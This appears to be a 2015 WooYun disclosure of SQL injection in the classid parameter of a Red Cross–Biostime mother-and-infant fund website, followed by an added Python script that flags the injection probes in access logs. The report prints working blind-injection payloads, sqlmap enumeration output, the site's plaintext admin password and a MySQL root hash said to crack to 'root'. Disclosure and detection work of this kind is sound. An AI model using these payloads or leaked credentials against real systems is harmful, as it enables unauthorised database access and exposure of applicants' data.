WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-07-19: Details sent to the vendor, awaiting vendor handling
2015-07-20: Vendor confirmed; details disclosed to the vendor only
2015-07-30: Details disclosed to core white hats and experts in the relevant field
2015-08-09: Details disclosed to regular white hats
2015-08-19: Details disclosed to intern white hats
2015-09-03: Details disclosed to the public
SQL injection vulnerability in a site under Biostime (合生元), with root privileges

001x The problem lies with this site: http://www.babycarefund.org/ (copyright: China Red Cross Foundation - Biostime Mother and Infant Aid Fund). A lookup shows that this site sits on the same IP as Biostime.

002x Injection point

http://www.babycarefund.org/news.php?classid=7 (GET)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classid=7 AND 5915=5915
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: classid=7 AND SLEEP(5)
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[09:42:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.14
back-end DBMS: MySQL 5.0.11

available databases [6]:
[*] biostimeqma
[*] information_schema
[*] jijinhui
[*] mysql
[*] sujia
[*] test
Current database

Database: jijinhui
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| w_apply        | 6825    |   <- fund applications
| w_region       | 3027    |
| w_question     | 738     |
| w_document     | 454     |
| w_news         | 158     |
| w_country      | 34      |
| w_menu         | 27      |
| w_product      | 18      |
| w_webbanner    | 10      |
| w_webcontent   | 8       |
| w_newsclass    | 6       |
| w_productclass | 6       |
| w_type         | 5       |
| w_class        | 3       |
| w_newstype     | 3       |
| w_media        | 2       |
| w_message      | 2       |
| w_area         | 1       |
| w_smtpconfig   | 1       |
| w_user         | 1       |
+----------------+---------+

Database: jijinhui
Table: w_user
[1 entry]
+------+------+--------+------------+-----------+------------+----------------+
| c_id | u_id | u_name | u_date     | u_content | u_username | u_password     |
+------+------+--------+------------+-----------+------------+----------------+
| 1    | 1    | admin  | 2010-04-01 | 1         | admin      | babycarefund07 |
+------+------+--------+------------+-----------+------------+----------------+

database management system users password hashes:
[*] root [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
There is only this one account, and its password cracks to root. The network was too poor to go any further; this is enough as proof.

Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-07-20 14:53
Many thanks to 路人甲 for the finding; we are actively handling it.
2015-07-27: While fixing the vulnerability we suddenly noticed that the system originally showed the discoverer as 路人甲, and it has now changed to Ton7BrEak. We still thank the discoverer of this vulnerability, thank you.
2015-08-25: Many thanks to Ton7BrEak for the vulnerability report; we have fixed this vulnerability. Thank you for your contribution.
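As an added example (not part of the original report or the site's own code), the script below shows how the two blind-injection probes sqlmap reported above would appear in the Nginx access log and flags them as a defender would; the log lines and IP addresses are constructed, and classid is assumed to be an integer-only parameter, as news.php uses it.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Nginx combined-format log lines (hypothetical IPs), modelled on
# the boolean-based and time-based payloads in the sqlmap output above.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jul/2015:09:42:31 +0800] "GET /news.php?classid=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Jul/2015:09:42:34 +0800] "GET /news.php?classid=7%20AND%205915%3D5915 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
203.0.113.5 - - [19/Jul/2015:09:42:41 +0800] "GET /news.php?classid=7%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
198.51.100.9 - - [19/Jul/2015:09:43:02 +0800] "GET /news.php?classid=12 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameters the application treats as integers (assumption); any other
# content in them is a strong signal on its own, regardless of payload shape.
INT_PARAMS = {"classid"}

# Signatures of the two blind techniques sqlmap reported: a tautology such as
# "AND 5915=5915" and a timing probe such as "AND SLEEP(5)".
BOOLEAN_RE = re.compile(r"\b(and|or)\b\s+(\d+)\s*=\s*\2\b", re.I)
TIME_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)


def classify_query(target):
    """Return findings for one request target, e.g. ['non-integer classid', 'boolean-based blind']."""
    findings = []
    # parse_qs percent-decodes values, so "%20AND%205915%3D5915" becomes " AND 5915=5915".
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            if name in INT_PARAMS and not value.isdigit():
                findings.append("non-integer %s" % name)
            if BOOLEAN_RE.search(value):
                findings.append("boolean-based blind")
            if TIME_RE.search(value):
                findings.append("time-based blind")
    return findings


def scan_log(text):
    """Parse each access-log line and return (ip, target, findings) for flagged requests only."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            findings = classify_query(m.group("target"))
            if findings:
                hits.append((m.group("ip"), m.group("target"), findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, ", ".join(findings))
```

The "non-integer classid" check is the same rule the application should enforce itself: casting classid to an integer (or binding it as one in a prepared statement) would have left both probes nothing to inject into.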